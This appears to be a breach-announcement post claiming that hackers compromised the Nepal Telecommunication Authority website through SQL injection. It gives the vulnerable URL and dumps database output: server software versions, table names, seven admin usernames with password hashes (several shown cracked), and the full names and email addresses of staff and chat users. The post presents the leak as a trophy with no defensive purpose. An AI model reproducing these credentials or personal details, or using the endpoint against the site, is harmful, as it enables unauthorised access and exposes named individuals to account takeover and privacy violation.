National Telecommunication Authority of Nepal hacked by w3bdf4c3r & n3ll4!h4ck3r. According to the hacker there was SQL-i vulnerability on their site, using that they hacked the entire Database exposed including admin details
Website:-
Vulnerable Link:-
www.nta.gov.np/en/aboutus/index.php?id=7
Exposed DB & Admin Credentials:-
##############ADMIN DETAILS#####################
USERNAME : Administrator
PASSWORD : cWccBbcbcLPCAYtMBA+c9jz6Q/Gvgn5FEPWxuwewFwY
##############SERVER DETAILS####################
web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
web application technology: Apache 2.2.16
back-end DBMS: MySQL 5.0
available databases [2]:
[*] dbase_nta
[*] information_schema
#########DATABASE NAMES############
Database: dbase_nta
[29 tables]
+----------------------+
| ajaxim_chats |
| ajaxim_users |
| poll_answers |
| poll_options |
| poll_questions |
| tblaboutus |
| tbladmin |
| tblarticles |
| tblemailtemplate |
| tblemployee |
| tblflashnews |
| tblgroup |
| tblindustry |
| tbllicenselist |
| tbllink |
| tbllinktype |
| tblmenu |
| tblmisreport |
| tblnewsnevents |
| tblperformanceform |
| tblperformancereport |
| tblpublicnotice |
| tblsettings |
| tblsitecontent |
| tblsitedefinition |
| tblsubscriber |
| tblsuccessstory |
| tbltestimonials |
| tblwhatsnew |
+----------------------+
Database: dbase_nta
Table: tbladmin
[8 columns]
+--------------------+-------------+
| Column | Type |
+--------------------+-------------+
| account_created_on | datetime |
| admin_id | int(11) |
| fullname | varchar(90) |
| last_logged_on | datetime |
| logged_times | int(11) |
| password | varchar(90) |
| user_type | int(11) |
| username | varchar(90) |
+--------------------+-------------+
Database: dbase_nta
Table: tbladmin
[7 entries]
+---------------+
| username |
+---------------+
| Administrator |
| newadmin |
| License |
| skhatiwada |
| employee |
| shiva |
| hiranya |
+---------------+
Database: dbase_nta
Table: tbladmin
[7 entries]
+-----------------------------------------------------+
| password |
+-----------------------------------------------------+
| cWccBbcbcLPCAYtMBA+c9jz6Q/Gvgn5FEPWxuwewFwY= |
| kDe+yWtg8ig1c7u/xUFGUNW346lxji9dULxj0zEgDpo= |
| dbeHX/VJnZX/k1WWX1/PgNtQ9J3vOAH4wRbOknMZpmM= |
| Cgvlz3lhqdQjnJme8mPyPbIz4aAcNrbcBrbG+qng10I= |
| ktvKe8xBnYQSdYdCXXqsUe1NPdyxubXuDiZqZhOc8U8= |
| b12d9c7d622fbf7c4d1ed40a3b13ada1ab342c5a (newworld) |
| tR2rHWvfuW1jUXZmetwRs+ggUx4D5ROXqBwOqG87Mos= |
+-----------------------------------------------------+
Database: dbase_nta
Table: tbladmin
[7 entries]
+-------------------+
| fullname |
+-------------------+
| Udaya Raj Regmi |
| new admin |
| License Section |
| Sunil Khatiwada |
| employee |
| shiva ram |
| HIiranya Bastkoti |
+-------------------+
Database: dbase_nta
Table: ajaxim_users
[7 columns]
+-----------+---------------------+
| Column | Type |
+-----------+---------------------+
| buddylist | text |
| email | text |
| id | bigint(20) unsigned |
| is_online | int(11) |
| last_ping | text |
| password | text |
| username | text |
+-----------+---------------------+
Database: dbase_nta
Table: ajaxim_users
[3 entries]
+-------------+
| username |
+-------------+
| sumanshakya |
| testuser |
| admin |
+-------------+
Database: dbase_nta
Table: ajaxim_users
[3 entries]
+-----------------------+
| email |
+-----------------------+
| nqholder@hotmail.com |
| test@test.com |
| nqholdesr@hotmail.com |
+-----------------------+
Database: dbase_nta
Table: ajaxim_users
[3 entries]
+-------------------------------------------+
| password |
+-------------------------------------------+
| 0e02d54612f4e7e959aea25c5a43a2ea |
| 098f6bcd4621d373cade4e832627b4f6 (test) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
+-------------------------------------------+
Database: dbase_nta
Table: tblemployee
[9 columns]
+----------------+---------------+
| Column | Type |
+----------------+---------------+
| department | tinytext |
| dt_appointment | date |
| email | varchar(200) |
| emp_id | int(11) |
| fullname | varchar(300) |
| grp_id | int(11) |
| isenable | enum('Y','N') |
| post | text |
| qualification | text |
+----------------+---------------+
Database: dbase_nta
Table: tblemployee
[5 entries]
+------------------+
| fullname |
+------------------+
| Shakya
Suman |
| ss |
| Suman Shakya |
| Sam Shrestha |
| Suresh Shrestha |
+------------------+
Database: dbase_nta
Table: tblemployee
[5 entries]
+-------------------------+
| email |
+-------------------------+
| nqholder@hotmail.com |
| suman.nta.com.np |
| nqholder@hotmail.com |
| sam@nta.com.np |
| sureshthedude@gmail.com |
+-------------------------+
For More Info Click Here
LINK TO OUR HOME PAGE :


Categories:
vulnerablity